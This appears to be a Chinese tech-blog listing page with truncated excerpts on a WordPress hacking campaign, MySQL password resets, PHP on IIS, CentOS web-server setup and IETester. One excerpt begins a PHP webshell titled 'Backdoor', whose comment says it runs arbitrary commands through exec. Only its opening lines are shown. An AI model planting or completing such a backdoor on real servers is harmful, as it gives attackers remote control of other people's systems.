M86安全实验室今天警告称一经发现有数百个基于WordPress的网站和博客被黑,主要影响版本3.2.1,表现在注入代码并将用户重定向到恶意网站中。攻击者还特别设定了安全策略,绕过垃圾邮件过滤器和反病毒特性。
黑客试图利用微软的IE浏览器,Adobe的PDF和Flash,Oracle的Java漏洞来攻击用户的PC并安装TDSS rootkit,感染后的机器将成为僵尸网络的一部分,目前还没有查出是谁在背后攻击,Websense建议WordPress用户升级到3.3.1最新版。
<?php
/* 页面显示口令输入框,利用exec执行任意命令,将执行结果显示到TextArea中 */
session_start();
echo ‘<html><head><title>Backdoor</title></head><body>’;
if($_REQUEST['action']==’logout’)
{
session_destroy();
unset($_SESSION['back_force']);
} Continue
解决方法:
方法一
使用phpmyadmin,这是最简单的了,修改mysql库的user表,
不过别忘了使用PASSWORD函数。
方法二
使用mysqladmin,这是前面声明的一个特例。
mysqladmin -u root -p password mypasswd
输入这个命令后,需要输入root的原密码,然后root的密码将改为mypasswd。
把命令里的root改为你的用户名,你就可以改你自己的密码了。
当然如果你的mysqladmin连接不上mysql server,或者你没有办法执行mysqladmin,那么这种方法就是无效的。 而且mysqladmin无法把密码清空。
下面的方法都在mysql提示符下使用,且必须有mysql的root权限。
IIS6.0本身就支持asp的,所以就不用说了,至于PHP,先介绍PHP安装步骤:
1、设置PHP目录
解压缩下载回来的php-5.2.6-Win32.zip到一个文件夹,我这里是c:/php。进入c:/php,把php.ini-dist文件重命名为php.ini,双击打开,搜索“extension_dir”,一般直接跳到extension_dir = “./”这里,然后把“./”改成“ext”(也就是把extension_dir = “./”改成extension_dir = “ext”。),这里是设置dll扩展文件夹目录的。然后再搜索“Windows Extensions”,在跳到的位置再稍微下拉一点点,把下面几个扩展前面注释用的分号去掉:
extension=php_gd2.dll
extension=php_mbstring.dll
extension=php_mysql.dll
改完之后保存退出。如果需要添加别的一些模块支持,把相应扩展前面的分号去掉即可。
2、添加PHP环境变量 Continue
第一部分基本环境配置
一、简单介绍
随着网络营销的普及和流行,尤其通过网络给企业带来的效益和利润,让越来越多的人意识到除了传统的销售和宣传模式外,如果利用网络资源为企业带来利润已经成为企业急需解决的问题,为此很多企业和个人现在都架设起了属于自己的服务器。而现在的服务器市场分成几个体系,第一个是Windows平台,第二个是Linux平台,剩下的主要以BSD平台为主。先介绍一下各种平台的优点和缺点:
Windows平台优点是搭建比较容易,可维护性高,通过很短时间内的培训就能很好的搭建出自己所需的各种服务。缺点是Windows安全漏洞比较多,如果没有任何安全意识的管理员来维护服务器的话,很快就可能被入侵,而且服务器的稳定性实在不敢恭维。 Continue
近几年,开源Linux操作系统在服务器端应用有了越来越多的案例,它的安全、开源、免费等特点得到了越来越多用户的关注。出于对Linux的喜爱,自己也曾对Linux下架设Web服务器进行了长久的尝试、测试,在去年的时候动手DIY了一台1U机架式Web服务器,托管在东莞电信机房。目前,该Web服务器运行一年多来,稳定性、性能表现非常不错。
很多人都说:配置Linux服务器不容易,感觉在命令行的模式下安装软件包,不利于软件的排错与配置。其实,就笔者的经验来看,由于在Linux系统拥有非常多且版本不同的源安装包,不同的硬件对应不同的源包,不同的Linux系统可能其安装源包的方式也稍有区别。所以,在安装配置Linux时,应该多了解自己的硬件与Linux之间的兼容性。
基于共同学习的原因,笔者精心整理了自己在配置Linux服务器过程中,一些安装步骤,配置心得等等。由于有着良好的应用基础,希望这些能够为Linux爱好者及初学者提供一个应用示范。本文针对CentOS 4.x或 RedHat EnterPrise Linux 4.x平台安装,同时要求配置人员对 Linux操作系统有一定的了解,懂得tar基本命令及常规的系统操作,如文件的删除、目录创建、移动、改名和vi编辑器的基本使用。
一、 前期思路:
作为Web服务器,我们需要对服务器后期的维护、管理等环节进行综合的考虑,完整的Web服务器应向外提供以下几个功能:Web服务器软件;上传或下载的FTP功能、远程控制管理等等。
Continue
IETester是一个免费的Web浏览器调试工具,可以模拟出不同的js引擎来帮助程序员设计效果统一的代码.IETester可以在独立的标签页中开启IE5.5、IE6、IE7、IE8、IE9以及最新的IE10这6个不同版本的IE。这样对于网页设计可谓帮忙了。
官方介绍:IETester is a free WebBrowser that allows you to have the rendering and javascript engines of IE10 preview, IE9, IE8, IE7 IE 6 and IE5.5 on Windows 7, Vista and XP, as well as the installed IE in the same process.
